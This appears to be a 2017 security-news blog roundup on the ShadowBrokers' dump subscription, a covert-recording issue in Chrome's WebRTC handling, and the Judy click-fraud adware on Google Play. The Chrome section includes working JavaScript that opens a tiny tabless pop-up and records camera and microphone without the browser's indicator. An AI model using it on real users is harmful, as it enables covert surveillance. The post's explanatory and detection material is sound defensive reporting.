
UNM4SK3D: ShadowBrokers, Chrome, and Google Play


By: Olivia

June 2, 2017



Move over 'Wine of the Month Club,' there's a new subscription service in town. On May 30th, the hacking group the ShadowBrokers announced their 'Monthly Dump Service,' with a hefty price tag of 100 Zcash (approximately $23,000 USD) per month and instructions on how to subscribe. In case you've forgotten, the ShadowBrokers are the group that leaked the SMB exploit (EternalBlue, addressed by Microsoft's MS17-010 patch) that was used to spread WannaCry ransomware worldwide. The unknowns behind the group have only continued to heighten the world's anxiety since the WannaCry attack, promising everything from browser, router and mobile exploits and attacks targeting Windows 10 machines to data stolen from SWIFT providers, central banks, and Russian, Chinese, Iranian or North Korean nuclear and missile programs.

Allegedly, the first dump will be released sometime between July 1st and July 17th to all confirmed subscribers. Those subscribers, in addition to paying, must provide a 'delivery email address,' to which the group will send an email containing a link and a unique password for each data dump. ShadowBrokers say the membership has been kept expensive because the dump is intended for specific groups, stating, "If you caring about losing $20k+ Euro then not being for you. Monthly dump is being for high rollers, hackers, security companies, OEMs, and governments."

Their requested currency, meanwhile, is a story of its own. Zcash is a newer cryptocurrency that claims to be more private than Bitcoin: in its shielded transactions the sender, recipient, and value are all hidden on the chain. The caveat is that this applies only to shielded addresses; Zcash also supports transparent addresses whose transactions are as public as Bitcoin's, and whoever sold you the coins for dollars still knows who bought them. The group itself has openly doubted even Zcash's anonymity on social media, in its trademark broken English. While they were initially not taken seriously by many, security experts have changed their tune since the group's earlier dumps turned out to be legitimate.
The validity of the newly promised dumps has yet to be verified, but assuming they are real, we should expect companies to weigh buying the dumps for their $20,000-plus monthly fee so they can fix their products before other attackers get hold of the new zero-day exploits. Paying a criminal group for stolen exploits also raises legal and ethical questions that each organization will have to answer for itself.
"This is being wrong question. Question to be asking 'Can my organization afford not to be first to get access to theshadowbrokers dumps?'" -statement from ShadowBrokers
Want to learn more about the hacking group? Read 'Shining Light on the ShadowBrokers.'


Is this a flaw or a bug? That's the question many are asking after AOL developer Ran Bar-Zik reported a vulnerability to Google in April that could allow malicious websites to record audio or video without alerting the user. Bar-Zik first discovered the issue at work, while dealing with a website that ran WebRTC (Web Real-Time Communications) code. Browser-based audio and video communication relies on WebRTC, which enables real-time communication over peer-to-peer connections without plugins. "To protect unauthorized streaming of audio and video without user's permission, the web browser first requests users to explicitly allow websites to use WebRTC and access device camera/microphone. Once granted, the website will have access to your camera and microphone forever until you manually revoke WebRTC permissions." (Chrome persists that grant only for HTTPS origins, but a persisted grant is exactly what this trick relies on.)

Typically, web browsers indicate to their users when any audio or video is being captured, but in this case they do not. If a site that already holds the permission uses JavaScript to open a small pop-up window with no tab strip (a 'headless' window), it can start recording audio and video in that window without the red recording dot, leaving no indication in the browser that capture is happening. Chrome draws the red dot on the tab, and a pop-up opened this way has no tab on which to draw it, which lets a site developer "exploit small UX manipulation to activate the MediaRecorder API without alerting the users." So far, the 'Big G' has declined to treat this as a valid security issue, which means no official patch is on the way, although in a statement they acknowledged they "are looking at ways to improve this situation." Whether or not it counts as a bug, it is certainly a privacy issue that could be exploited by attackers. Our recommendation: review which sites hold camera and microphone permission (chrome://settings/content/camera and chrome://settings/content/microphone) and revoke any you do not need; Chrome has no built-in switch that turns WebRTC off entirely.
"A real attack will not be very obvious, of course. It can use a very small pop-under, submit the data anywhere and close it when the user is focusing on it. It can use the camera for a millisecond to get your picture." -Ran Bar-Zik, AOL Developer
For tips and tricks on securing your favorite browser, read 'Workarounds for Chrome.' 
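To make the mechanics concrete, here is an added example, written for this post rather than taken from Ran Bar-Zik's report or from Chrome, that reconstructs the flow described above and adds the check a defender can run against an origin. The browser objects (window, navigator.mediaDevices, MediaRecorder, navigator.permissions) are passed in as parameters, an assumption made so the functions can be exercised outside a browser; the URL and timing values are placeholders.

```javascript
// Added example (not from the original post or from Bar-Zik's report).
// Reconstructs the flow the article describes: an origin that already holds
// camera/microphone permission opens a tiny pop-up window and drives the
// MediaRecorder API from there. Browser globals are injected as parameters
// so the same functions can be exercised under Node with fakes.

// 1. The "UX manipulation": a pop-up with no tab strip. Chrome draws its red
//    "recording" dot on the tab, so a window opened like this has nowhere to
//    show it. `url` is a placeholder for the attacker-controlled page.
function openDetachedWindow(win, url) {
  const features = 'width=1,height=1,left=0,top=0,menubar=no,toolbar=no,location=no';
  return win.open(url, '_blank', features);
}

// 2. Inside that window: capture for `durationMs`, then resolve with the
//    non-empty chunks the recorder produced. A real payload would POST the
//    chunks somewhere; here they are simply returned to the caller.
async function recordClip(mediaDevices, RecorderCtor, constraints, durationMs) {
  const stream = await mediaDevices.getUserMedia(constraints); // no prompt if already granted
  const chunks = [];
  const recorder = new RecorderCtor(stream);
  const finished = new Promise((resolve) => {
    recorder.ondataavailable = (ev) => {
      if (ev.data && ev.data.size > 0) chunks.push(ev.data);
    };
    recorder.onstop = () => resolve(chunks);
  });
  recorder.start();
  await new Promise((r) => setTimeout(r, durationMs));
  recorder.stop();
  stream.getTracks().forEach((t) => t.stop()); // release the device again
  return finished;
}

// 3. Defender side: ask the Permissions API whether this origin already holds
//    a persistent grant. A state of 'granted' means the next getUserMedia()
//    call will succeed with no prompt at all.
async function mediaPermissionState(permissions) {
  const names = ['camera', 'microphone'];
  const results = await Promise.all(names.map((name) => permissions.query({ name })));
  return Object.fromEntries(names.map((name, i) => [name, results[i].state]));
}

// True when at least one capture device is silently reachable from here.
function canRecordWithoutPrompt(states) {
  return Object.values(states).some((state) => state === 'granted');
}
```

In a browser, `openDetachedWindow(window, url)` is called from a page the user has already granted, and `recordClip(navigator.mediaDevices, MediaRecorder, { audio: true, video: true }, 3000)` runs inside the opened window. Running `mediaPermissionState(navigator.permissions)` from the developer console on any site shows 'granted' for the origins that will never prompt you again; Chrome accepts the 'camera' and 'microphone' permission names, other browsers may reject them.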


Judy's causing a lot of issues. And we're not talking about the famous TV judge. This Judy is the name of an adware family that generates fraudulent ad clicks for revenue, in what may be the largest malware campaign seen on the Google Play Store. According to security firm Check Point, as many as 36.5 million Android devices may have installed the malicious ad-click code. In a blog post published May 26th, the researchers revealed that 41 apps developed by Korea-based Kiniwini and published under the moniker ENISTUDIO Corp generate fake advertisement clicks from infected devices. Researchers also uncovered a few more apps, published by other developers on the Play Store, that contain the same 'Judy' code. So far, "the connection between the two campaigns remains unclear, though researchers believe it is possible that one developer borrowed code from the other, 'knowingly or unknowingly'." The malicious apps appear to have been in operation for over a year.

The apps, which all contain 'Judy' in the title and are variations on similar themes (Fashion Judy: Snow Queen style, Animal Judy: Persian cat care, and Chef Judy: Halloween Cookies, to name a few), are functioning games. In the background, they act as a bridge between the victim's device and the adware server. Once installed, an app silently registers the device with a remote command-and-control server, from which it receives the actual malicious payload: JavaScript that drives the click fraud. The app then opens a hidden web page with a spoofed User-Agent header, so that the traffic looks like it came from a desktop browser, and generates clicks. Researchers say, "Once the targeted website is launched, the malware uses the JavaScript code to locate and click on banners from the Google ads infrastructure." Because the payload is fetched at runtime, the APK that passed Google Play's review carries no ad-click logic of its own, which is how it stayed in the store for so long. Google has since removed the apps from Google Play, but if you have any installed on your phone, remove them immediately.
"It is quite unusual to find an actual organization behind mobile malware, as most of it is developed by purely malicious actors." -Check Point security researchers
Protect yourself in the Google Play store. Read 'How to Identify Malware/ Spyware Attacks.'
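The behaviour described above (a handset whose requests suddenly claim to be a desktop browser and hammer ad-serving hosts) is something a proxy or MDM log can reveal. The following is an added example of that detection logic, written for this post and not taken from Check Point's report; the log format, the field names and the sample lines are constructed here, so adapt `parseLine()` to whatever your gateway actually emits.

```javascript
// Added example (not from the original post or from Check Point's report):
// detection logic for a Judy-style handset. The log format, field names and
// sample lines are constructed for this example.

// Ad-serving hosts a click-fraud payload would target (Google ads
// infrastructure, as the article says). Extend with your own list.
const AD_HOSTS = new Set([
  'googleads.g.doubleclick.net',
  'pagead2.googlesyndication.com',
]);

// A User-Agent claiming a desktop OS. Mobile Chrome on Android reports
// "(Linux; Android ...)" and carries the "Mobile" token, so it does not match.
const DESKTOP_UA = /\((Windows NT|Macintosh; Intel Mac OS X|X11; Linux x86_64)/;

// Constructed log line shape (assumed, not a real product format):
//   <timestamp> device=<id> os=<os> ua="<user-agent>" url=<url>
const LINE_RE = /^(\S+) device=(\S+) os=(\S+) ua="([^"]*)" url=(\S+)$/;

function parseLine(line) {
  const m = LINE_RE.exec(line.trim());
  if (!m) return null; // malformed lines are skipped, not fatal
  const [, ts, device, os, ua, url] = m;
  let host = '';
  try { host = new URL(url).hostname; } catch (e) { /* unparsable URL: no host */ }
  return { ts, device, os, ua, host };
}

// Flag a device when all three hold:
//   (a) the gateway knows it is an Android handset,
//   (b) at least one of its requests used a desktop User-Agent, and
//   (c) it reached ad hosts at least `minAdHits` times.
// Returns one report object per flagged device.
function findJudyLikeDevices(lines, minAdHits = 3) {
  const perDevice = new Map();
  for (const line of lines) {
    const rec = parseLine(line);
    if (!rec) continue;
    let d = perDevice.get(rec.device);
    if (!d) {
      d = { os: rec.os, total: 0, desktopUa: 0, adHits: 0, userAgents: new Set() };
      perDevice.set(rec.device, d);
    }
    d.total += 1;
    d.userAgents.add(rec.ua);
    if (DESKTOP_UA.test(rec.ua)) d.desktopUa += 1;
    if (AD_HOSTS.has(rec.host)) d.adHits += 1;
  }

  const flagged = [];
  for (const [device, d] of perDevice) {
    const isAndroid = d.os.toLowerCase().startsWith('android');
    if (isAndroid && d.desktopUa > 0 && d.adHits >= minAdHits) {
      flagged.push({
        device,
        requests: d.total,
        desktopUaRequests: d.desktopUa,
        adHits: d.adHits,
        distinctUserAgents: d.userAgents.size,
      });
    }
  }
  return flagged;
}

// Constructed sample: one handset behaving like a Judy victim, one clean
// handset that merely browsed a site carrying Google ads, and a junk line.
const MOBILE_UA = 'Mozilla/5.0 (Linux; Android 7.0; SM-G930F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36';
const SPOOFED_UA = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36';
const AD_URL = 'https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0000000000000000';

const SAMPLE_LOG = [
  `2017-05-26T09:00:01Z device=handset-a os=android-7.0 ua="${MOBILE_UA}" url=https://play.google.com/store`,
  `2017-05-26T09:00:07Z device=handset-a os=android-7.0 ua="${SPOOFED_UA}" url=https://www.example.com/`,
  `2017-05-26T09:00:08Z device=handset-a os=android-7.0 ua="${SPOOFED_UA}" url=${AD_URL}`,
  `2017-05-26T09:00:09Z device=handset-a os=android-7.0 ua="${SPOOFED_UA}" url=${AD_URL}`,
  `2017-05-26T09:00:10Z device=handset-a os=android-7.0 ua="${SPOOFED_UA}" url=${AD_URL}`,
  `2017-05-26T09:01:00Z device=handset-b os=android-6.0.1 ua="${MOBILE_UA}" url=https://www.example.com/`,
  `2017-05-26T09:01:02Z device=handset-b os=android-6.0.1 ua="${MOBILE_UA}" url=${AD_URL}`,
  'garbage line that should be ignored',
];

function demo() {
  return findJudyLikeDevices(SAMPLE_LOG);
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(demo(), null, 2));
}
```

The clean handset also touches an ad host, which is normal for any page carrying Google ads; it is the combination of a desktop User-Agent on a known Android device with repeated ad-host traffic that makes the signal worth an alert. Tune `minAdHits` to your traffic volume and window the counts per hour rather than over a whole day.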


The 2017 Global Threat Intelligence Report (GTIR) by NTT Security reveals that 77% of all ransomware detected globally was in four main sectors: business and professional services (28%), government (19%), healthcare (15%) and retail (15%).


The question of most concern to us is: how do you make sure what we're doing supports, and is strategically aligned with, the business? To develop an effective security strategy, one must take a proactive stance toward security threats. This requires thorough planning and a deep understanding of the concepts, methods, and goals of security strategy. The Developing a Security Strategy Micro Certification focuses on the six outcomes of effective security strategy, enabling you to understand the reasoning behind them and why it is important that personnel support the goals of the business. In this lesson, participants will become familiar with how those outcomes relate to management directives. Use code OBLOG50 for half off any micro certification.

Olivia Lynch (@Cybrary_Olivia) is the Marketing Manager at Cybrary. Like many of you, she is just getting her toes wet in the infosec field and is working to make cyber security news more interesting. A firm believer that the pen is mightier than the sword, Olivia considers corny puns and an honest voice essential to any worthwhile blog.